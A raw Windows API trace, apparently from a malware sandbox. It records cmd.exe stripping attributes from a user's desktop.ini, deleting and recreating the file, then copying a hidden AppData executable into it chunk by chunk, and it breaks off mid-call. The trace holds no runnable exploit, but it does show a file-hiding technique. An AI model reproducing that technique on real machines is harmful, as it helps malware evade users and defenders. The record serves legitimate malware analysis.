[0129.578] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26eedc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26ef28 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini\" ", lpProcessInformation=0x26ef28*(hProcess=0x50, hThread=0x4c, dwProcessId=0x6dc, dwThreadId=0x140)) returned 1 [0129.623] CloseHandle (hObject=0x4c) returned 1 [0129.623] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0129.623] GetEnvironmentStringsW () returned 0x380838* [0129.623] FreeEnvironmentStringsW (penv=0x380838) returned 1 [0129.623] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0129.838] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26ee1c | out: lpExitCode=0x26ee1c*=0x0) returned 1 [0129.838] CloseHandle (hObject=0x50) returned 1 [0129.838] _vsnwprintf (in: _Buffer=0x26ef64, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ee28 | out: _Buffer="00000000") returned 8 [0129.838] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0129.838] GetEnvironmentStringsW () returned 0x382558* [0129.838] FreeEnvironmentStringsW (penv=0x382558) returned 1 [0129.838] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0129.838] GetEnvironmentStringsW () returned 0x382558* [0129.838] FreeEnvironmentStringsW (penv=0x382558) returned 1 [0129.838] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ee80 | out: lpAttributeList=0x26ee80) [0129.838] GetConsoleTitleW (in: lpConsoleTitle=0x26f200, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.839] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e278, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x26e27c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x26e278*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0129.839] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0129.839] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0129.839] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0129.839] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\desktop.ini")) returned 0x20 [0129.839] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x11 [0129.839] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0129.839] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0129.839] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\desktop.ini")) returned 0x20 [0129.840] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x3835e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3835e4) returned 0x382c78 [0129.840] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\desktop.ini")) returned 1 [0129.840] FindNextFileW (in: hFindFile=0x382c78, lpFindFileData=0x3835e4 | out: lpFindFileData=0x3835e4) returned 0 [0129.840] GetLastError () returned 0x12 [0129.840] FindClose (in: hFindFile=0x382c78 | out: hFindFile=0x382c78) returned 1 [0129.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.841] GetFileType (hFile=0x7) returned 0x2 [0129.841] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0129.841] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f39c | out: lpMode=0x26f39c) returned 1 [0129.841] _dup (_FileHandle=1) returned 3 [0129.841] _close (_FileHandle=1) returned 0 [0129.842] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini", _String2="con") returned -53 [0129.842] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\docume~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f36c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0129.842] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0129.842] GetConsoleTitleW (in: lpConsoleTitle=0x26f19c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.842] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x26ed00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ed00) returned 0x37e5e8 [0129.842] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0129.842] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0129.842] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0129.842] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26dc0c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0129.843] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0129.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.843] GetFileType (hFile=0x58) returned 0x1 [0129.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.843] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x26dc64 | out: lpFileSizeHigh=0x26dc64*=0x0) returned 0x7d600 [0129.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.843] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.843] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.843] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.843] GetFileType (hFile=0x50) returned 0x1 [0129.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.843] GetFileType (hFile=0x50) returned 0x1 [0129.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.843] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] GetFileType (hFile=0x50) returned 0x1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] GetFileType (hFile=0x50) returned 0x1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] GetFileType (hFile=0x50) returned 0x1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] GetFileType (hFile=0x50) returned 0x1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.844] GetFileType (hFile=0x50) returned 0x1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] GetFileType (hFile=0x50) returned 0x1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.845] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.845] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] GetFileType (hFile=0x50) returned 0x1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] GetFileType (hFile=0x50) returned 0x1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] GetFileType (hFile=0x50) returned 0x1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] GetFileType (hFile=0x50) returned 0x1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] GetFileType (hFile=0x50) returned 0x1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.845] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] GetFileType (hFile=0x50) returned 0x1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] GetFileType (hFile=0x50) returned 0x1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] GetFileType (hFile=0x50) returned 0x1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.846] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.846] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] GetFileType (hFile=0x50) returned 0x1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] GetFileType (hFile=0x50) returned 0x1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] GetFileType (hFile=0x50) returned 0x1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] GetFileType (hFile=0x50) returned 0x1 [0129.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.846] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] GetFileType (hFile=0x50) returned 0x1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] GetFileType (hFile=0x50) returned 0x1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] GetFileType (hFile=0x50) returned 0x1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] GetFileType (hFile=0x50) returned 0x1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.847] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.847] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] GetFileType (hFile=0x50) returned 0x1 [0129.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.847] GetFileType (hFile=0x50) returned 0x1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] GetFileType (hFile=0x50) returned 0x1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] GetFileType (hFile=0x50) returned 0x1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] GetFileType (hFile=0x50) returned 0x1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] GetFileType (hFile=0x50) returned 0x1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] GetFileType (hFile=0x50) returned 0x1 [0129.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.848] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] GetFileType (hFile=0x50) returned 0x1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.849] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.849] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.849] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.849] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] GetFileType (hFile=0x50) returned 0x1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] GetFileType (hFile=0x50) returned 0x1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] GetFileType (hFile=0x50) returned 0x1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] GetFileType (hFile=0x50) returned 0x1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] GetFileType (hFile=0x50) returned 0x1 [0129.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.849] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] GetFileType (hFile=0x50) returned 0x1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] GetFileType (hFile=0x50) returned 0x1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] GetFileType (hFile=0x50) returned 0x1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.850] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.850] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] GetFileType (hFile=0x50) returned 0x1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] GetFileType (hFile=0x50) returned 0x1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.850] GetFileType (hFile=0x50) returned 0x1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] GetFileType (hFile=0x50) returned 0x1 [0129.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.851] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, 